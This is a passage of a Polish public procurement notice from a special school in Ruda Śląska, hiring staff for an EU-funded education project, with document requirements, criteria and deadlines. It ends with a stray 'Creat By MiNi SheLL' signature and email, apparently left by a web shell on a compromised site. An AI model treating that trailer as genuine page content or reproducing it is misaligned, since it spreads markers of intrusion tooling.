Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez zamawiającego, spowoduje wykluczenie wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty niespełniające wymogów, co do formy traktuje się jako niezłożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3
CZĘŚĆ 4
1. W celu potwierdzenia spełniania warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 

a. Formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 1 do SIWZ,
b. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
c. Kwestionariusz osobowy wraz z oświadczeniem - Załącznik nr 3 do SIWZ,
d. Zaświadczenie lub inny dokument potwierdzający doświadczenie pracy księgowej;
e. Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie 
z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
f. Oświadczenie o posiadaniu zdolności organizacyjnych oraz o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność.
g. Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych.
i. Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
j. Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela.
UWAGA! 
Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez zamawiającego, spowoduje wykluczenie wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty niespełniające wymogów, co do formy traktuje się jako niezłożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3
CZĘŚĆ 5
1. W celu potwierdzenia spełniania warunków stawianych wykonawcom przez zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
a. Formularz oferty - wypełniony i podpisany przez Wykonawcę - Załącznik nr 1 do SIWZ,
b. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - Załącznik nr 2 do SIWZ,
c. Kwestionariusz osobowy wraz z oświadczeniem - Załącznik nr 3 do SIWZ,
d. Zaświadczenie lub inny dokument potwierdzający doświadczenie pracy księgowej;
e. Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie 
z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
f. Oświadczenie o posiadaniu zdolności organizacyjnych oraz o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków aplikacyjnych PO KL i generatora wniosków o płatność.
g. Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadaniu pełnej zdolności do czynności prawnych oraz korzystaniu z pełni praw publicznych.
i. Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
j. Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych, ustawy o finansach publicznych oraz ustawy Karta Nauczyciela.
UWAGA! 
Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez zamawiającego, spowoduje wykluczenie wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty niespełniające wymogów, co do formy traktuje się jako niezłożenie wymaganych dokumentów z zastrzeżeniem art. 26 ust. 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)nie były karane za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, .
2) posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
3) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

Ocena spełnienia warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 9 specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokumenty potwierdzające kwalifikacje do do pracy na określonym stanowisku specjalisty oraz dokumenty poświadczające uprawnienia do pracy z dziećmi i młodzieżą z niepełnosprawnością intelektualną w stopniu umiarkowanym i znacznym oraz głębokim  (jeśli są wymagane).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - liczba opracowywanych lub realizowanych projektów finansowanych ze środkó unijnych - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lukaszki.mssm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Specjalnych Nr 3, ul. Sygietyńskiego 6, Ruda Śląska 41-710 - sekretariat szkoły..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 08:00, miejsce: Zespół Szkół Specjalnych Nr 3, ul. Sygietyńskiego 6, Ruda Śląska 41-710 - sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nauczanie przez doświadczenie, realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. 
W części 3 zamawiający przewiduje zatrudnienie dwóch osób, dzieląc proporcjonalnie liczbę przepracowanych godzin. Należy złożyć formularz ofertowy na każde stanowisko oddzielnie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyłonienie kandydata zarządzającego projektem, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. liczba opracowywanych lub realizowanych projektów finansowanych ze środkó unijnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyłonienie kandydata do świadczenia usług  Koordynatora ds. organizacyjno-ewaluacyjnych, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. liczba opracowywanych lub realizowanych projektów finansowanych ze środkó unijnych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyłonienie kandydata do świadczenia usług  Koordynatora ds. finansowych, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. liczba opracowywanych lub realizowanych projektów finansowanych ze środk - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyłonienie kandydata do świadczenia usług  głównego księgowego, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. liczba opracowywanych lub realizowanych projektów finansowanych ze środk - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyłonienie kandydata do świadczenia usług na stanowisku pomocy biurowej, w ramach Projektu Nauczanie przez doświadczanie, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX: Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.21.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. OPIS ZE WSKAZANIEM WIELKOŚCI LUB ZAKRESU ZAMÓWIENIA ZAWARTY JEST  CZĘŚCI: II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com